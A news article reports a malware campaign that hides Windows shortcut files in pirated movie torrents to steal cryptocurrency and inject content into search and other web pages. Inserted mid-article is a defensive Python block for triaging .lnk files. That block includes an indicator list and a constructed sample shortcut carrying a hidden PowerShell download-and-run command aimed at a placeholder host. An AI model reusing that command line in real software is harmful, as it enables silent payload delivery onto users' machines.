
Newly discovered malware leverages torrented movies to steal Crypto and manipulate Google Search

  • The new threat seems to emerge from torrent sites such as The Pirate Bay, where the malware is often disguised as movie files.
  • Delivered as a Windows shortcut (.lnk) file, it runs a chain of commands in the background to steal cryptocurrency.

If you are a movie buff and download movies from torrents, chances are that your device could get infected with new malware that can steal your cryptocurrency, and modify your online search results too.

On Saturday, the activity of the new malware was detailed in an article published by Bleeping Computer. A security researcher named 0xffff0800 found an odd-looking file after downloading The Girl in the Spider’s Web (a movie based on Stieg Larsson’s Millennium book series) from The Pirate Bay.

The file has a ‘.lnk’ (Windows shortcut) extension; when opened on Windows it runs a PowerShell command that can download additional malicious payloads to the system.
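The shortcut technique described above can be triaged statically before anything is opened. The following is an added example, not code from the article or from the researcher: it parses the fixed ShellLink header and the StringData section of a .lnk file (per the MS-SHLLINK layout) and flags shortcuts that launch a hidden PowerShell command. The indicator list and the sample shortcut are constructed here for the demonstration.

```python
import struct

HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08  # LinkFlags (MS-SHLLINK 2.1.1)
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window out of sight
# Assumed indicator list (not from the article): typical PowerShell downloader switches
SUSPICIOUS = ("powershell", "-enc", "-w hidden", "windowstyle hidden", "iex(", "downloadstring", "-nop")

def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand plus the StringData fields (name, paths, arguments) of a .lnk blob."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00":
        raise ValueError("not a ShellLink header")
    flags = struct.unpack_from("<I", data, 20)[0]
    fields = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 76
    if flags & HAS_ID_LIST:  # skip LinkTargetIDList: 2-byte size, then the item list
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize counts the size field itself
        pos += struct.unpack_from("<I", data, pos)[0]
    width = 2 if flags & IS_UNICODE else 1
    for key, bit in (("name", HAS_NAME), ("relative_path", HAS_REL_PATH), ("working_dir", HAS_WORK_DIR),
                     ("arguments", HAS_ARGS), ("icon", HAS_ICON)):
        if flags & bit:  # each StringData item: 2-byte char count, then the chars, no terminator
            count = struct.unpack_from("<H", data, pos)[0]
            fields[key] = data[pos + 2:pos + 2 + count * width].decode("utf-16-le" if width == 2 else "cp1252", "replace")
            pos += 2 + count * width
    return fields

def triage_lnk(data: bytes) -> list:
    """Reasons the shortcut looks like a hidden PowerShell launcher; empty list means nothing flagged."""
    info = parse_lnk(data)
    text = " ".join(info.get(k, "") for k in ("relative_path", "working_dir", "arguments")).lower()
    reasons = [f"command line contains '{s}'" for s in SUSPICIOUS if s in text]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window is minimized and never activated")
    return reasons

def build_sample_lnk(rel_path: str, args: str, show: int) -> bytes:
    """Constructed sample shortcut (not the real dropper) carrying only RelativePath and Arguments."""
    clsid = b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"  # ShellLink CLSID
    header = struct.pack("<I16sIIQQQIIIHHII", 76, clsid, HAS_REL_PATH | HAS_ARGS | IS_UNICODE,
                         0x20, 0, 0, 0, 0, 0, show, 0, 0, 0, 0)
    item = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + item(rel_path) + item(args)

def sample_movie_lnk() -> bytes:
    """A 'movie' shortcut that really launches hidden PowerShell; constructed for the demo."""
    return build_sample_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                            "-nop -w hidden -c \"iex((New-Object Net.WebClient).DownloadString('http://example.invalid/p'))\"",
                            SW_SHOWMINNOACTIVE)
```

Run `triage_lnk(open(path, "rb").read())` over a downloaded torrent folder to list shortcuts worth quarantining before anyone double-clicks them.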

Malware messes with Google Search results

The capabilities of the ‘.lnk’ file extend to the web as well. It modifies web pages such as Google and Yandex search result pages. What’s more, it also replaces the victim’s cryptocurrency wallet addresses with the attacker’s wallet address.

“To do this, the malware modifies registry keys to disable Windows Defender protection if Microsoft's antivirus is enabled. It also forcibly installs in Firefox an extension called 'Firefox Protection' and hijacks the Chrome extension called 'Chrome Media Router', with the ID ‘pkedcjkdefgpdelpbcmbmeomcjbeemfm’," reported Bleeping Computer.

Along with the ‘.lnk’ file, there were two hidden ‘.exe’ files as well. However, these two fail to execute because of a coding error by the attackers.

Fake Wikipedia ‘Donation’

Web injection by the malware also affects Wikipedia. The site’s main page displays a fake donation message that ends with a bitcoin and an ethereum wallet address.

The Russian social networking website VKontakte is also targeted through web page injection, which inserts code advertising various offers (torrent trackers or cryptocurrency).

Once on the system, this movie malware stays in the filesystem unless it is quarantined. Users are advised to avoid downloading movie torrents from suspicious sites, as doing so can leave a malware infection on the device for a long time.
